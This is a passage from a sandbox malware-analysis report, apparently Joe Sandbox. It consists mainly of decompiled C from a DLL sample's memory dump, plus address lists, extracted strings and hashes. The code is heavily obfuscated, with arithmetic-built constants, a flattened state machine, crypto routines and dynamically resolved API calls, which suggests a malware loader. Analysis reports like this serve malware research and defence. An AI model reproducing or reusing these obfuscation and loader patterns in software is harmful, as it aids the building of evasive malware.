				_v376 = _v376 << 0xf;
				_v376 = _v376 ^ 0x563f0855;
				_v412 = 0x448f7a;
				_v412 = _v412 << 0xd;
				_v412 = _v412 >> 2;
				_v412 = _v412 ^ 0x24738c34;
				_v356 = 0xc97c1e;
				_v356 = _v356 ^ 0x373e9b5c;
				_v356 = _v356 ^ 0x37f1bea5;
				_v548 = 0xc08620;
				_t856 = 0x3e;
				_v548 = _v548 * 0x48;
				_v548 = _v548 >> 0xe;
				_v548 = _v548 + 0x8cd4;
				_v548 = _v548 ^ 0x00077c97;
				_v504 = 0x1bacca;
				_v504 = _v504 / _t856;
				_v504 = _v504 + 0xffff3533;
				_v504 = _v504 + 0xffffc69c;
				_v504 = _v504 ^ 0xfffb1415;
				_v512 = 0x4f44ee;
				_v512 = _v512 + 0x177f;
				_v512 = _v512 + 0xce0c;
				_v512 = _v512 << 2;
				_v512 = _v512 ^ 0x014cc697;
				_v360 = 0x8b661;
				_t857 = 0x1e;
				_v360 = _v360 / _t857;
				_v360 = _v360 ^ 0x000dc15c;
				_v520 = 0xb38031;
				_v520 = _v520 | 0xa1714482;
				_t858 = 0x36;
				_t870 = _v296;
				_v520 = _v520 * 0x52;
				_v520 = _v520 + 0xc23a;
				_v520 = _v520 ^ 0xe016b971;
				_v496 = 0x319ddd;
				_v496 = _v496 / _t858;
				_t859 = 0x3b;
				_t860 = _v296;
				_v496 = _v496 / _t859;
				_v496 = _v496 + 0xffffa02a;
				_v496 = _v496 ^ 0xfff3e4c0;
				_v352 = 0x3691e9;
				_t769 = _v296;
				_v352 = _v352 / _t768;
				_v352 = _v352 ^ 0x000e8b32;
				_v408 = 0x2ac6b;
				_v408 = _v408 * 0x5a;
				_v408 = _v408 << 9;
				_v408 = _v408 ^ 0xe13230fa;
				_v392 = 0x204939;
				_v392 = _v392 + 0x4ed4;
				_v392 = _v392 * 0x35;
				_v392 = _v392 ^ 0x06bd0f48;
				_v336 = 0x1179fc;
				_v336 = _v336 + 0xffff73d1;
				_v336 = _v336 ^ 0x0013f977;
				_v400 = 0xb07871;
				_v400 = _v400 >> 3;
				_v400 = _v400 | 0xc580b254;
				_v400 = _v400 ^ 0xc59d0b5c;
				_v344 = 0x9fe4dd;
				_v344 = _v344 << 0xe;
				_v344 = _v344 ^ 0xf932a85a;
				_v328 = 0xd2ff81;
				_v328 = _v328 ^ 0x82aa1598;
				_v328 = _v328 ^ 0x827d602f;
				_v488 = 0x92e76b;
				_v488 = _v488 | 0x6946c4e8;
				_v488 = _v488 + 0xbbca;
				_v488 = _v488 * 0x54;
				_v488 = _v488 ^ 0xbac9f786;
				_v384 = 0xafba80;
				_v384 = _v384 ^ 0x0a481803;
				_v384 = _v384 << 6;
				_v384 = _v384 ^ 0xb9e44209;
				while(1) {
					L1:
					_t707 = 0x9c71ab3;
					do {
						while(1) {
							L2:
							_t875 = _t864 - 0x86fed85;
							if(_t875 <= 0) {
								break;
							}
							__eflags = _t864 - _t707;
							if(__eflags == 0) {
								_push(_v432);
								_t770 = _t860 + _t870;
								_push(_v308);
								_push(0x861808);
								_v292 = _t770;
								_t708 = E00874244(_v340, _v424, __eflags);
								__eflags = _t770 - _t870;
								_t769 = E0087E1AC(_v536, _t770 - _t870, _t870,  &_v256, _v312,  &_v288, _v332,  &_v128, _v320, _t770 - _t870) + _t870;
								E0087FECB(_t708, _v528, _v368, _v416, _v376);
								_t774 = _v480;
								_t871 =  &(_t871[0xe]);
								_t864 = 0x1bf95f7;
								_t707 = 0x9c71ab3;
								goto L31;
							}
							__eflags = _t864 - 0xe33788a;
							if(_t864 == 0xe33788a) {
								_t860 = 0x4000;
								_push(_t774);
								_push(_t774);
								_t758 = E0086C5D8(0x4000);
								_t871 =  &(_t871[3]);
								_v300 = _t758;
								__eflags = _t758;
								if(__eflags == 0) {
									return _t758;
								}
								_t864 = 0x77316ed;
								L14:
								_t774 = _v480;
								while(1) {
									L1:
									_t707 = 0x9c71ab3;
									goto L2;
								}
							}
							__eflags = _t864 - 0xf34fc82;
							if(_t864 == 0xf34fc82) {
								_push(_t774);
								_push(_t774);
								_t860 = E0087CCA0(4, 0x10);
								_push( &_v128);
								_push(_t860);
								_push(_v560);
								_t833 = 0xb;
								E0086E404(_v456, _t833);
								_t864 = 0x5f37ccd;
								L13:
								_t871 =  &(_t871[7]);
								goto L14;
							}
							__eflags = _t864 - 0xfefbdda;
							if(_t864 == 0xfefbdda) {
								E00882B09(_v328, _v300, _v488, _v384);
								return 0;
							}
							__eflags = _t864 - 0xffd9b77;
							if(__eflags != 0) {
								goto L31;
							}
							_t864 = 0x17d426e;
						}
						if(_t875 == 0) {
							_t860 = _t860 +  *((intOrPtr*)(_t774 + 4));
							_push(_t774);
							_push(_t774);
							_t718 = E0086C5D8(_t860);
							_t774 = _v480;
							_t870 = _t718;
							_t871 =  &(_t871[3]);
							__eflags = _t870;
							_t707 = 0x9c71ab3;
							_t864 =  !=  ? 0x9c71ab3 : 0xfefbdda;
							goto L2;
						}
						if(_t864 == 0x17d426e) {
							_push(_t774);
							_push(_t774);
							_t860 = E0087CCA0(1, 8);
							_push( &_v288);
							_push(_t860);
							_push(_v492);
							_t832 = 9;
							E0086E404(_v436, _t832);
							_t864 = 0xf34fc82;
							goto L13;
						}
						if(_t864 == 0x1bf95f7) {
							E0087C9B0(_v412, _t769, _v356,  *((intOrPtr*)(_t774 + 4)),  *_t774, _v548);
							_t774 = _v480;
							_t871 =  &(_t871[4]);
							_t864 = 0x7c1f8ac;
							_t769 = _t769 +  *((intOrPtr*)(_t774 + 4));
							goto L1;
						}
						if(_t864 == 0x5f37ccd) {
							_t867 =  &_v256;
							_push(_t774);
							_push(_t774);
							_t836 = E0087CCA0(8, 0x10);
							_t871 =  &(_t871[4]);
							_t732 = _v420;
							__eflags = _t732 - _t836;
							if(_t732 < _t836) {
								_t844 = _t836 - _t732;
								_t861 = _t867;
								_t786 = _t844 >> 1;
								__eflags = _t786;
								_t740 = memset(_t861, 0x2d002d, _t786 << 2);
								asm("adc ecx, ecx");
								_t867 = _t867 + _t844 * 2;
								memset(_t861 + _t786, _t740, 0);
								_t871 =  &(_t871[6]);
								_t774 = 0;
							}
							_push(_t774);
							_push(_t774);
							_t737 = E0087CCA0(8, 0x10);
							_push(_t867);
							_t860 = _t737;
							_push(_t860);
							_push(_v388);
							_t837 = 0xb;
							E0086E404(_v444, _t837);
							_t864 = 0xe33788a;
							goto L13;
						}
						if(_t864 == 0x77316ed) {
							_push(_v472);
							_push(_v468);
							_push(_v572);
							_t742 = E0087E1F8(0x8617a8, _v372, __eflags);
							_t871 =  &(_t871[3]);
							_push( &_v256);
							_push(_t742);
							_push(_t860);
							_push(_v300);
							 *((intOrPtr*)(E008831AA(0xb00b1257, 0x44)))();
							E0087FECB(_t742, _v324, _v564, _v524, _v380);
							_t864 = 0x86fed85;
							goto L13;
						}
						_t880 = _t864 - 0x7c1f8ac;
						if(_t864 != 0x7c1f8ac) {
							goto L31;
						}
						_push(_v520);
						_push(_v360);
						_push(0x861778);
						_t750 = E00863325( &_v256, E00874244(_v504, _v512, _t880), _v292 - _t769, _v352, _v408, _t769);
						E0087FECB(_t747, _v392, _v336, _v400, _v344);
						_t752 = _v296;
						 *_t752 = _t870;
						 *((intOrPtr*)(_t752 + 4)) = _t769 + _t750 - _t870;
						L10:
						return _v300;
						L31:
						__eflags = _t864 - 0xc7faa3a;
					} while (__eflags != 0);
					goto L10;
				}
			}

0x00872e5d
0x00872e5d
0x00872e67
0x00872e6e
0x00872e72
0x00872e7d
0x00872e8d
0x00872e94
0x00872e99
0x00872ea4
0x00872eb4
0x00872eb9
0x00872ebf
0x00872ec7
0x00872ecc
0x00872ed4
0x00872edc
0x00872ee4
0x00872eec
0x00872ef4
0x00872efc
0x00872f04
0x00872f11
0x00872f14
0x00872f18
0x00872f20
0x00872f28
0x00872f30
0x00872f40
0x00872f44
0x00872f4c
0x00872f54
0x00872f5f
0x00872f72
0x00872f73
0x00872f7a
0x00872f85
0x00872f8d
0x00872f92
0x00872f97
0x00872f9f
0x00872fa7
0x00872fb2
0x00872fba
0x00872fc5
0x00872fd9
0x00872fe0
0x00872feb
0x00872ff6
0x00872ffe
0x00873003
0x0087300b
0x00873013
0x0087301b
0x00873028
0x0087302c
0x00873034
0x0087303c
0x00873047
0x00873052
0x0087305d
0x00873068
0x00873070
0x00873080
0x00873085
0x0087308b
0x00873090
0x00873098
0x008730a0
0x008730ad
0x008730ae
0x008730b2
0x008730ba
0x008730c2
0x008730cd
0x008730d5
0x008730e0
0x008730eb
0x008730f6
0x00873101
0x0087310c
0x00873117
0x00873122
0x0087312a
0x00873135
0x00873140
0x00873153
0x0087315a
0x00873165
0x00873172
0x00873176
0x0087317e
0x00873186
0x0087318e
0x0087319b
0x0087319f
0x008731a7
0x008731af
0x008731b7
0x008731c2
0x008731cd
0x008731d8
0x008731eb
0x008731f2
0x008731fa
0x00873205
0x00873210
0x0087321b
0x00873226
0x00873231
0x0087323c
0x00873247
0x00873252
0x0087325d
0x00873265
0x0087326f
0x00873273
0x0087327b
0x00873283
0x00873297
0x0087329e
0x008732a9
0x008732b4
0x008732bc
0x008732c4
0x008732c9
0x008732ce
0x008732d6
0x008732e1
0x008732e9
0x008732f4
0x008732fe
0x00873303
0x00873311
0x00873316
0x0087331c
0x00873324
0x0087332f
0x0087333f
0x00873342
0x00873349
0x00873354
0x0087335c
0x00873369
0x0087336d
0x00873375
0x00873380
0x0087338b
0x00873396
0x0087339e
0x008733a3
0x008733ab
0x008733b3
0x008733bb
0x008733c3
0x008733cb
0x008733d3
0x008733db
0x008733e3
0x008733f6
0x008733f9
0x00873400
0x0087340b
0x00873416
0x00873421
0x0087342c
0x00873437
0x00873442
0x0087344d
0x00873458
0x0087346e
0x00873475
0x0087347d
0x00873488
0x00873490
0x0087349c
0x0087349f
0x008734a3
0x008734a8
0x008734b0
0x008734bb
0x008734c6
0x008734d1
0x008734dc
0x008734e4
0x008734ef
0x008734fa
0x00873505
0x00873510
0x0087351b
0x00873526
0x00873539
0x00873540
0x0087354d
0x00873555
0x0087355d
0x00873565
0x0087356a
0x00873572
0x0087357d
0x00873588
0x00873593
0x0087359e
0x008735a6
0x008735b1
0x008735c5
0x008735ca
0x008735d3
0x008735de
0x008735ea
0x008735ef
0x008735f5
0x008735fd
0x00873602
0x0087360a
0x00873615
0x00873620
0x0087362b
0x0087363e
0x00873641
0x00873653
0x0087365a
0x00873665
0x00873670
0x00873678
0x00873683
0x0087368e
0x00873696
0x0087369e
0x008736a9
0x008736b4
0x008736bf
0x008736ca
0x008736d7
0x008736da
0x008736de
0x008736e3
0x008736eb
0x008736f3
0x00873703
0x00873707
0x0087370f
0x00873717
0x0087371f
0x00873727
0x0087372f
0x00873737
0x0087373c
0x00873744
0x00873756
0x00873759
0x00873760
0x0087376d
0x00873775
0x00873784
0x00873787
0x0087378e
0x00873792
0x0087379a
0x008737a2
0x008737b2
0x008737ba
0x008737bf
0x008737c6
0x008737ca
0x008737d2
0x008737da
0x008737ee
0x008737f5
0x008737fc
0x00873807
0x0087381a
0x00873821
0x00873829
0x00873834
0x0087383f
0x00873852
0x00873859
0x00873864
0x0087386f
0x0087387a
0x00873885
0x00873890
0x00873898
0x008738a3
0x008738ae
0x008738b9
0x008738c1
0x008738cc
0x008738d7
0x008738e2
0x008738ed
0x008738f5
0x008738fd
0x0087390a
0x0087390e
0x00873916
0x00873921
0x0087392c
0x00873934
0x0087393f
0x0087393f
0x0087393f
0x00873944
0x00873944
0x00873944
0x00873944
0x0087394a
0x00000000
0x00000000
0x00873be6
0x00873be8
0x00873ca8
0x00873caf
0x00873cb2
0x00873cc7
0x00873ccc
0x00873cd3
0x00873cda
0x00873d26
0x00873d34
0x00873d39
0x00873d40
0x00873d43
0x00873d48
0x00000000
0x00873d48
0x00873bee
0x00873bf4
0x00873c6d
0x00873c84
0x00873c85
0x00873c87
0x00873c8c
0x00873c8f
0x00873c96
0x00873c98
0x00873a22
0x00873a22
0x00873c9e
0x00873a8d
0x00873a8d
0x0087393f
0x0087393f
0x0087393f
0x00000000
0x0087393f
0x0087393f
0x00873bf6
0x00873bfc
0x00873c36
0x00873c37
0x00873c41
0x00873c4a
0x00873c4b
0x00873c4c
0x00873c59
0x00873c5a
0x00873c5f
0x00873a8a
0x00873a8a
0x00000000
0x00873a8a
0x00873bfe
0x00873c04
0x00873d77
0x00000000
0x00873d7e
0x00873c0a
0x00873c10
0x00000000
0x00000000
0x00873c16
0x00873c16
0x00873950
0x00873bb0
0x00873bc1
0x00873bc2
0x00873bc4
0x00873bc9
0x00873bcd
0x00873bcf
0x00873bd7
0x00873bd9
0x00873bde
0x00000000
0x00873bde
0x0087395c
0x00873b72
0x00873b73
0x00873b7d
0x00873b86
0x00873b87
0x00873b88
0x00873b95
0x00873b96
0x00873b9b
0x00000000
0x00873b9b
0x00873968
0x00873b46
0x00873b4b
0x00873b52
0x00873b55
0x00873b5a
0x00000000
0x00873b5a
0x00873974
0x00873a9d
0x00873ab6
0x00873ab7
0x00873ac1
0x00873ac3
0x00873ac6
0x00873acd
0x00873acf
0x00873ad1
0x00873ad3
0x00873adc
0x00873adc
0x00873ade
0x00873ae0
0x00873ae2
0x00873ae5
0x00873ae5
0x00873ae5
0x00873ae5
0x00873afe
0x00873aff
0x00873b04
0x00873b09
0x00873b0a
0x00873b0c
0x00873b0d
0x00873b1d
0x00873b1e
0x00873b23
0x00000000
0x00873b23
0x00873980
0x00873a23
0x00873a2c
0x00873a33
0x00873a3e
0x00873a43
0x00873a54
0x00873a55
0x00873a56
0x00873a57
0x00873a66
0x00873a80
0x00873a85
0x00000000
0x00873a85
0x00873986
0x0087398c
0x00000000
0x00000000
0x00873992
0x00873996
0x008739a5
0x008739d6
0x008739fb
0x00873a00
0x00873a0c
0x00873a0e
0x00873a11
0x00000000
0x00873d4d
0x00873d4d
0x00873d4d
0x00000000
0x00873d59

Strings

*a<, xrefs: 0087354D
9I , xrefs: 00873834
-3n3, xrefs: 00872F18
$7, xrefs: 00873231
5S, xrefs: 0087357D
3, xrefs: 00872FBA
!s9, xrefs: 00873375
IF, xrefs: 00873380
|I9, xrefs: 008731A7
I,, xrefs: 00872F85
1TPy, xrefs: 0087310C
DO, xrefs: 0087371F
Gd, xrefs: 00873117
Sg, xrefs: 00873098
kn_, xrefs: 008730C2
DJ3, xrefs: 00872F28
8j, xrefs: 008735A6

Memory Dump Source

Source File: 00000000.00000002.703048375.0000000000861000.00000020.00000001.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.703041906.0000000000860000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.703166511.0000000000886000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: !s9$*a<$-3n3$1TPy$5S$8j$9I $DJ3$IF$Sg$kn_$|I9$$7$3$DO$Gd$I,
API String ID: 0-3070105227
Opcode ID: 564f3ea2bc10d9ecb0076d1da189711367d96f7244772035c184cc9886edae31
Instruction ID: 8828548366d8ffa90b2d8227beb8c88356516b262bcc0568df2d0f81aa1c4271
Opcode Fuzzy Hash: 564f3ea2bc10d9ecb0076d1da189711367d96f7244772035c184cc9886edae31
Instruction Fuzzy Hash: 7E720E715083818BD3B8CF25C58AB9BBBE1FBC4718F10891DE6D99A260D7B09949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 00863431, Relevance: 17.0, Strings: 13, Instructions: 746
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E00863431(intOrPtr __ecx) {
				char _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				char* _v48;
				intOrPtr _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				char _v68;
				intOrPtr _v72;
				char _v76;
				char _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				unsigned int _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				signed int _v332;
				signed int _v336;
				signed int _v340;
				signed int _v344;
				signed int _v348;
				signed int _v352;
				signed int _v356;
				signed int _v360;
				signed int _v364;
				signed int _v368;
				signed int _v372;
				signed int _v376;
				signed int _v380;
				signed int _v384;
				signed int _v388;
				signed int _v392;
				signed int _v396;
				signed int _v400;
				signed int _v404;
				signed int _v408;
				signed int _v412;
				signed int _v416;
				signed int _v420;
				signed int _v424;
				signed int _v428;
				signed int _v432;
				signed int _v436;
				signed int _v440;
				signed int _v444;
				signed int _v448;
				void* _t880;
				void* _t883;
				intOrPtr _t884;
				intOrPtr _t891;
				void* _t892;
				signed int _t894;
				char _t897;
				void* _t905;
				intOrPtr _t918;
				void* _t919;
				intOrPtr _t925;
				intOrPtr _t927;
				void* _t929;
				signed int _t935;
				signed int _t936;
				signed int _t937;
				signed int _t938;
				signed int _t939;
				signed int _t940;
				signed int _t941;
				signed int _t942;
				signed int _t943;
				signed int _t944;
				signed int _t945;
				signed int _t946;
				signed int _t947;
				signed int _t948;
				signed int _t949;
				signed int _t950;
				signed int _t951;
				void* _t952;
				intOrPtr _t974;
				intOrPtr _t977;
				void* _t1017;
				intOrPtr _t1018;
				void* _t1038;
				intOrPtr _t1039;
				void* _t1041;
				void* _t1046;
				signed int* _t1048;
				signed int* _t1052;
				void* _t1054;

				_t1048 =  &_v448;
				_v436 = 0x369131;
				_v436 = _v436 >> 0xc;
				_v72 = __ecx;
				_t1046 = 0;
				_t935 = 0x47;
				_v436 = _v436 / _t935;
				_t929 = 0xda5043f;
				_t936 = 0x5f;
				_v436 = _v436 * 0x17;
				_v436 = _v436 ^ 0x4d42455f;
				_v208 = 0xf6fdfa;
				_v208 = _v208 | 0x2cc981c8;
				_v208 = _v208 ^ 0x2cfffdfb;
				_v424 = 0xd0dd87;
				_v424 = _v424 << 0xd;
				_v424 = _v424 | 0x1c0753be;
				_v424 = _v424 << 0xb;
				_v424 = _v424 ^ 0xbf9df000;
				_v168 = 0x27916c;
				_v168 = _v168 << 0xc;
				_v168 = _v168 ^ 0x7916c000;
				_v112 = 0xb477a9;
				_v112 = _v112 << 0xb;
				_v112 = _v112 ^ 0xa3bd4800;
				_v220 = 0xe97999;
				_v220 = _v220 + 0xffffec6a;
				_v220 = _v220 ^ 0x00e96603;
				_v204 = 0x9e1a7f;
				_v204 = _v204 >> 5;
				_v204 = _v204 ^ 0x0004f0d3;
				_v268 = 0x424ea5;
				_v268 = _v268 ^ 0x63de6ac8;
				_v268 = _v268 + 0xffff47e2;
				_v268 = _v268 ^ 0x639b6c4f;
				_v260 = 0xd00e0b;
				_v260 = _v260 + 0x7bec;
				_v260 = _v260 + 0x9dda;
				_v260 = _v260 ^ 0x00d127d1;
				_v200 = 0x4c3c29;
				_v200 = _v200 + 0xffffc8b9;
				_v200 = _v200 ^ 0x004c04e2;
				_v248 = 0x4debf8;
				_v248 = _v248 + 0xffff1b2a;
				_v248 = _v248 << 9;
				_v248 = _v248 ^ 0x9a0e4400;
				_v228 = 0x8afd86;
				_v228 = _v228 / _t936;
				_v228 = _v228 << 4;
				_v228 = _v228 ^ 0x001768a0;
				_v96 = 0x2eb3c6;
				_v96 = _v96 << 0xd;
				_v96 = _v96 ^ 0xd678c020;
				_v420 = 0x274aed;
				_v420 = _v420 | 0x31740d1a;
				_v420 = _v420 + 0xffff9582;
				_v420 = _v420 | 0x350cf820;
				_v420 = _v420 ^ 0x35767196;
				_v364 = 0x6881b7;
				_v364 = _v364 * 7;
				_v364 = _v364 + 0xffffc912;
				_v364 = _v364 * 0x25;
				_v364 = _v364 ^ 0x69b6ddf9;
				_v184 = 0xd44f20;
				_v184 = _v184 ^ 0xce5a0ea9;
				_v184 = _v184 ^ 0xce89b855;
				_v264 = 0x81d5a2;
				_v264 = _v264 >> 8;
				_v264 = _v264 ^ 0x29112c15;
				_v264 = _v264 ^ 0x291faa41;
				_v100 = 0x37cb15;
				_t937 = 6;
				_v100 = _v100 * 0x62;
				_v100 = _v100 ^ 0x1559514e;
				_v380 = 0xd5dbc2;
				_v380 = _v380 ^ 0x7753e321;
				_v380 = _v380 + 0xffff7b0c;
				_v380 = _v380 << 8;
				_v380 = _v380 ^ 0x85ba1641;
				_v176 = 0xe5b425;
				_v176 = _v176 ^ 0xa878a978;
				_v176 = _v176 ^ 0xa898c785;
				_v120 = 0xd260b8;
				_v120 = _v120 / _t937;
				_v120 = _v120 ^ 0x00230c57;
				_v288 = 0xdcc1d5;
				_v288 = _v288 | 0xf1bc740f;
				_v288 = _v288 >> 0xf;
				_v288 = _v288 ^ 0x000063e4;
				_v232 = 0xe5d66a;
				_t938 = 0x2c;
				_v232 = _v232 * 0x6c;
				_v232 = _v232 / _t938;
				_v232 = _v232 ^ 0x02301c7d;
				_v296 = 0x2a124;
				_v296 = _v296 | 0xd0f8a1f6;
				_v296 = _v296 >> 3;
				_v296 = _v296 ^ 0x1a145567;
				_v160 = 0xc3c6af;
				_v160 = _v160 + 0xd2dc;
				_v160 = _v160 ^ 0x00c22786;
				_v348 = 0x8f150e;
				_v348 = _v348 + 0xa59e;
				_t939 = 0x59;
				_v348 = _v348 / _t939;
				_v348 = _v348 >> 0xe;
				_v348 = _v348 ^ 0x00038203;
				_v412 = 0x22c1c6;
				_v412 = _v412 | 0x52a0f1e9;
				_v412 = _v412 >> 0xe;
				_v412 = _v412 + 0x5f9c;
				_v412 = _v412 ^ 0x0003206f;
				_v256 = 0x6eace8;
				_v256 = _v256 | 0x5e36471d;
				_v256 = _v256 + 0xaa22;
				_v256 = _v256 ^ 0x5e7c911d;
				_v372 = 0x114227;
				_v372 = _v372 << 0xe;
				_v372 = _v372 >> 4;
				_v372 = _v372 + 0xffff3250;
				_v372 = _v372 ^ 0x05091a3a;
				_v152 = 0xb2c113;
				_v152 = _v152 | 0xd4a79ff0;
				_v152 = _v152 ^ 0xd4b69369;
				_v404 = 0xac8dd0;
				_v404 = _v404 | 0xfe2c74c4;
				_v404 = _v404 + 0xfffff2df;
				_v404 = _v404 ^ 0xd6ca137b;
				_v404 = _v404 ^ 0x2865160f;
				_v92 = 0xc872d4;
				_v92 = _v92 ^ 0x1ab36d9e;
				_v92 = _v92 ^ 0x1a793755;
				_v104 = 0x4ab196;
				_v104 = _v104 << 8;
				_v104 = _v104 ^ 0x4ab50517;
				_v448 = 0xada0e7;
				_t940 = 0x71;
				_v448 = _v448 * 0x69;
				_v448 = _v448 ^ 0xf900bd50;
				_v448 = _v448 + 0x197e;
				_v448 = _v448 ^ 0xbe3853b0;
				_v396 = 0x11e923;
				_v396 = _v396 + 0x3954;
				_v396 = _v396 / _t940;
				_v396 = _v396 >> 0xc;
				_v396 = _v396 ^ 0x00018e0c;
				_v336 = 0x5f85c1;
				_v336 = _v336 | 0x2e05641a;
				_v336 = _v336 + 0xffffe3b2;
				_v336 = _v336 ^ 0x2e57dda5;
				_v144 = 0xd04b4f;
				_v144 = _v144 | 0x24a920ad;
				_v144 = _v144 ^ 0x24f2194c;
				_v332 = 0xa51135;
				_v332 = _v332 | 0x0e3f3b11;
				_v332 = _v332 << 1;
				_v332 = _v332 ^ 0x1d7bc296;
				_v432 = 0x91d3da;
				_v432 = _v432 ^ 0xfb7827da;
				_v432 = _v432 ^ 0x8307cadb;
				_v432 = _v432 ^ 0x96a6215b;
				_v432 = _v432 ^ 0xee460da5;
				_v440 = 0x76ea73;
				_t941 = 0x68;
				_v440 = _v440 * 0x64;
				_v440 = _v440 * 0x74;
				_v440 = _v440 + 0xffff4177;
				_v440 = _v440 ^ 0x0c5f6cc4;
				_v84 = 0xe35803;
				_v84 = _v84 << 2;
				_v84 = _v84 ^ 0x038e6518;
				_v416 = 0xaf3ba8;
				_v416 = _v416 / _t941;
				_v416 = _v416 << 4;
				_v416 = _v416 ^ 0x48935165;
				_v416 = _v416 ^ 0x4881449f;
				_v212 = 0x801900;
				_v212 = _v212 + 0xffff42b5;
				_v212 = _v212 ^ 0x0072cd25;
				_v308 = 0xdd451d;
				_v308 = _v308 << 7;
				_v308 = _v308 + 0xffff5c98;
				_v308 = _v308 ^ 0x6ea87981;
				_v400 = 0xde1a46;
				_v400 = _v400 + 0xffff765a;
				_v400 = _v400 / _t941;
				_v400 = _v400 << 9;
				_v400 = _v400 ^ 0x044894be;
				_v316 = 0xd965ab;
				_t942 = 0x67;
				_v316 = _v316 / _t942;
				_v316 = _v316 ^ 0xab5bfdd1;
				_v316 = _v316 ^ 0xab5ad192;
				_v408 = 0x2ea377;
				_v408 = _v408 ^ 0x7c77aa70;
				_v408 = _v408 * 0x1b;
				_t943 = 0x5b;
				_v408 = _v408 / _t943;
				_v408 = _v408 ^ 0x00544ec9;
				_v324 = 0xbe9a08;
				_t944 = 0x3b;
				_v324 = _v324 * 0x43;
				_v324 = _v324 >> 2;
				_v324 = _v324 ^ 0x0c769314;
				_v300 = 0x976b15;
				_v300 = _v300 + 0xffff7da5;
				_v300 = _v300 ^ 0x81b758ca;
				_v300 = _v300 ^ 0x81238506;
				_v180 = 0xcec496;
				_v180 = _v180 + 0xd8a;
				_v180 = _v180 ^ 0x00c56088;
				_v188 = 0xaed086;
				_v188 = _v188 / _t944;
				_v188 = _v188 ^ 0x0009ea52;
				_v196 = 0x3b56fa;
				_v196 = _v196 ^ 0xac6111bd;
				_v196 = _v196 ^ 0xac5e4370;
				_v292 = 0x9c517b;
				_t945 = 0xe;
				_v292 = _v292 * 0x4d;
				_v292 = _v292 << 0x10;
				_v292 = _v292 ^ 0x81f0babf;
				_v164 = 0xb8b001;
				_v164 = _v164 * 0x6d;
				_v164 = _v164 ^ 0x4ea63487;
				_v172 = 0xad6cfe;
				_v172 = _v172 + 0xffff2ed4;
				_v172 = _v172 ^ 0x00a06f33;
				_v392 = 0x7c182;
				_v392 = _v392 + 0xffff354a;
				_v392 = _v392 >> 9;
				_v392 = _v392 | 0x25902c29;
				_v392 = _v392 ^ 0x259a4e3f;
				_v384 = 0x5bc0d6;
				_v384 = _v384 << 1;
				_v384 = _v384 >> 3;
				_v384 = _v384 >> 0xb;
				_v384 = _v384 ^ 0x00007445;
				_v148 = 0xb53a42;
				_v148 = _v148 + 0x9a8c;
				_v148 = _v148 ^ 0x00ba1df9;
				_v340 = 0x4937cc;
				_v340 = _v340 / _t945;
				_v340 = _v340 * 0x55;
				_v340 = _v340 ^ 0x01b4526f;
				_v156 = 0xcb2355;
				_v156 = _v156 + 0x87d8;
				_v156 = _v156 ^ 0x00cab12c;
				_v276 = 0x1d3606;
				_v276 = _v276 ^ 0xef8573e3;
				_v276 = _v276 + 0xe74c;
				_v276 = _v276 ^ 0xef9451f2;
				_v124 = 0xea90d8;
				_v124 = _v124 >> 0xc;
				_v124 = _v124 ^ 0x000c3a09;
				_v132 = 0x9d7def;
				_v132 = _v132 << 0xe;
				_v132 = _v132 ^ 0x5f719987;
				_v376 = 0x89d7c2;
				_v376 = _v376 + 0xfffff23e;
				_v376 = _v376 | 0x7c68b11f;
				_v376 = _v376 ^ 0xbb3726b5;
				_v376 = _v376 ^ 0xc7d510ca;
				_v140 = 0x76a014;
				_t946 = 0x62;
				_v140 = _v140 * 0x5d;
				_v140 = _v140 ^ 0x2b1c15f7;
				_v236 = 0x97a0b2;
				_v236 = _v236 + 0xb8c3;
				_v236 = _v236 / _t946;
				_v236 = _v236 ^ 0x00048326;
				_v244 = 0xf40f05;
				_v244 = _v244 >> 9;
				_v244 = _v244 + 0xffff2918;
				_v244 = _v244 ^ 0xfff951ac;
				_v252 = 0x8be7d4;
				_t947 = 0x63;
				_v252 = _v252 * 0x1e;
				_v252 = _v252 | 0x42cac185;
				_v252 = _v252 ^ 0x52ef1e67;
				_v116 = 0xbde76;
				_v116 = _v116 * 0x7b;
				_v116 = _v116 ^ 0x05b04958;
				_v328 = 0xeb1d65;
				_v328 = _v328 + 0xffffd1f9;
				_v328 = _v328 / _t947;
				_v328 = _v328 ^ 0x00025d34;
				_v280 = 0x68b6dc;
				_v280 = _v280 << 4;
				_v280 = _v280 + 0xffffca90;
				_v280 = _v280 ^ 0x06815cee;
				_v284 = 0x6fbf52;
				_t948 = 0x39;
				_v284 = _v284 / _t948;
				_v284 = _v284 >> 0xc;
				_v284 = _v284 ^ 0x000af32e;
				_v128 = 0xe16a7a;
				_v128 = _v128 << 0xa;
				_v128 = _v128 ^ 0x85a6bd86;
				_v136 = 0xc45446;
				_v136 = _v136 * 0x2c;
				_v136 = _v136 ^ 0x21b71382;
				_v356 = 0x71f336;
				_v356 = _v356 ^ 0x2de7f7fe;
				_v356 = _v356 ^ 0x8a07c7d3;
				_v356 = _v356 ^ 0x93c759d9;
				_v356 = _v356 ^ 0x3457e38a;
				_v444 = 0xc2e3ca;
